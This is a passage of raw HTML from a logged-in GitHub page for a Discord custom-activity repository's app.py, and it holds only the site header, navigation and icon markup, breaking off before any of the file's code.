content="YmM1ZWQ3YTU2YWQxZWUyNTM3YzRhMzM4M2MyODg5MzI0OWZiYmQxNmRhZTFhYmM5MTU1YzEwZGQ0YzZjNTRlMnx7InJlbW90ZV9hZGRyZXNzIjoiMTQwLjIxMy43LjE4NCIsInJlcXVlc3RfaWQiOiJBNDlGOjc4NTk6RDM5Njg6MTRGQUNEOjYxNUFFMjg1IiwidGltZXN0YW1wIjoxNjMzMzQ2MTgxLCJob3N0IjoiZ2l0aHViLmNvbSJ9"> <meta name="keyboard-shortcuts-preference" content="all"> <meta name="enabled-features" content="BRANCH_PROTECTION_RULE_WEBHOOK,MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="c968ea42bc668fd66601e1b1178d236136ff381f20e8b8409d15e3dcd3c1c765"> <meta http-equiv="x-pjax-csp-version" content="8bb37f5b1649ef2bd79e9fefcbdd2cf21c1ba6315dbff4f9055455365d2daa86"> <meta http-equiv="x-pjax-css-version" content="b2fa4163e7018ea220c6ecc3a98eb4b79de0edb28e96ffba31345742dc34a9d7"> <meta http-equiv="x-pjax-js-version" content="b62840f36bdd7b926c395951e9aa0f266160de0281ac06d8cd24486348846c8e"> <meta name="go-import" content="github.com/agambajwa/discord-custom-activity git https://github.com/agambajwa/discord-custom-activity.git"> <meta name="octolytics-dimension-user_id" content="30459122" /><meta name="octolytics-dimension-user_login" content="agambajwa" /><meta name="octolytics-dimension-repository_id" content="298526344" /><meta name="octolytics-dimension-repository_nwo" content="agambajwa/discord-custom-activity" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="298526344" /><meta name="octolytics-dimension-repository_network_root_nwo" content="agambajwa/discord-custom-activity" /> <link rel="canonical" href="https://github.com/agambajwa/discord-custom-activity/blob/master/app.py" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta 
name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"> <meta name="color-scheme" content="light dark" /> <meta name="msapplication-TileImage" content="/windows-tile.png"> <meta name="msapplication-TileColor" content="#ffffff"> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-in env-production page-responsive page-blob" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> <a href="#start-of-content" class="p-3 color-bg-info-inverse color-text-white show-on-focus js-skip-to-content">Skip to content</a> <span data-view-component="true" class="progress-pjax-loader js-pjax-loader-bar Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar color-bg-info-inverse"></span> </span> <header class="Header js-details-container Details px-3 px-md-4 px-lg-5 flex-wrap flex-md-nowrap" role="banner" > <div class="Header-item mt-n1 mb-n1 d-none d-md-flex"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" 
data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item d-md-none"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="Header-link js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path> </svg> </button> </div> <div class="Header-item Header-item--full flex-column flex-md-row width-full flex-order-2 flex-md-order-none mr-0 mr-md-3 mt-3 mt-md-0 Details-content--hidden-not-important d-md-flex"> <div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to" > <div class="position-relative"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" 
data-scope-type="Repository" data-scope-id="298526344" data-scoped-search-url="/agambajwa/discord-custom-activity/search" data-owner-scoped-search-url="/users/agambajwa/search" data-unscoped-search-url="/search" action="/agambajwa/discord-custom-activity/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search or jump to…" data-unscoped-placeholder="Search or jump to…" data-scoped-placeholder="Search or jump to…" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search or jump to…" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" value="0TRNZE4AKSd7FDM4Jmb/6vBlsky+mAoILrfFfkkGXsFpeLxUCyLlu1AqgkfeyqWebEqpzzt6jMaWf/NsLwPdbw==" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" 
role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img 
class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> </ul> <ul class="d-none js-jump-to-no-results-template-container"> <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-text-secondary">No suggested jump to results</span> </li> </ul> <ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> 
<path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository 
</span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="owner_scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 
00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" 
aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 
color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-center flex-items-center p-0 f5 js-jump-to-suggestion"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="m-3 anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </li> </ul> </div> </label> </form> </div> </div> <nav class="d-flex flex-column flex-md-row flex-self-stretch flex-md-self-auto" aria-label="Global"> <a class="Header-link py-md-3 d-block d-md-none py-2 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:dashboard:user" aria-label="Dashboard" href="/dashboard"> Dashboard </a> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g p" data-ga-click="Header, click, Nav menu - item:pulls context:user" aria-label="Pull requests you created" data-selected-links="/pulls /pulls/assigned /pulls/mentioned /pulls" href="/pulls"> Pull<span class="d-inline d-md-none d-lg-inline"> request</span>s </a> <a class="js-selected-navigation-item 
Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g i" data-ga-click="Header, click, Nav menu - item:issues context:user" aria-label="Issues you created" data-selected-links="/issues /issues/assigned /issues/mentioned /issues" href="/issues"> Issues </a> <div class="d-flex position-relative"> <a class="js-selected-navigation-item Header-link flex-auto mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:marketplace context:user" data-octo-click="marketplace_click" data-octo-dimensions="location:nav_bar" data-selected-links=" /marketplace" href="/marketplace"> Marketplace </a> </div> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:explore" data-selected-links="/explore /trending /trending/developers /integrations /integrations/feature/code /integrations/feature/collaborate /integrations/feature/ship showcases showcases_search showcases_landing /explore" href="/explore"> Explore </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:workspaces context:user" data-selected-links="/codespaces /codespaces" href="/codespaces"> Codespaces </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:Sponsors" data-hydro-click="{&quot;event_type&quot;:&quot;sponsors.button_click&quot;,&quot;payload&quot;:{&quot;button&quot;:&quot;HEADER_SPONSORS_DASHBOARD&quot;,&quot;sponsorable_login&quot;:&quot;Bomzz06&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" 
data-hydro-click-hmac="bd1bd75996ab4eff9f5b387e38edf22001205b12681e2842dd057d0e48923133" data-selected-links=" /sponsors/accounts" href="/sponsors/accounts">Sponsors</a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/settings/profile"> Settings </a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/Bomzz06"> <img class="avatar avatar-user" loading="lazy" decoding="async" src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" width="20" height="20" alt="@Bomzz06" /> Bomzz06 </a> <!-- '"` --><!-- </textarea></xmp> --></option></form><form action="/logout" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="7CRAnGj7pqObLLiqjYJPpFQeg2cccpPDh0ctdI4Lqo0Hlukm6FXrZK/EIk1HHF4MURwQnRCShkxzFpTKrvK3qg==" /> <button type="submit" class="Header-link mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade d-md-none btn-link d-block width-full text-left" style="padding-left: 2px;" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;sign out&quot;,&quot;label&quot;:&quot;icon:logout&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c463a3af349de8e5d9dbb16a9542d05b9d2d051ce270dca9bac1fd9137a14c9a" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-sign-out v-align-middle"> <path fill-rule="evenodd" d="M2 2.75C2 1.784 2.784 1 3.75 1h2.5a.75.75 0 010 1.5h-2.5a.25.25 0 00-.25.25v10.5c0 .138.112.25.25.25h2.5a.75.75 0 010 1.5h-2.5A1.75 1.75 0 012 13.25V2.75zm10.44 4.5H6.75a.75.75 0 000 1.5h5.69l-1.97 1.97a.75.75 0 101.06 1.06l3.25-3.25a.75.75 0 000-1.06l-3.25-3.25a.75.75 0 10-1.06 
1.06l1.97 1.97z"></path> </svg> Sign out </button> </form></nav> </div> <div class="Header-item Header-item--full flex-justify-center d-md-none position-relative"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item mr-0 mr-md-3 flex-order-1 flex-md-order-none"> <notification-indicator class="js-socket-channel" data-test-selector="notifications-indicator" data-channel="eyJjIjoibm90aWZpY2F0aW9uLWNoYW5nZWQ6OTE3MzcxMDMiLCJ0IjoxNjMzMzQ2MTgxfQ==--5e54d272a19096ed553a1610cc3407141ef88eed8ceb8bfdd60a0ad8f63d0370"> <a href="/notifications" class="Header-link notification-indicator position-relative tooltipped tooltipped-sw" aria-label="You have no unread notifications" data-hotkey="g n" 
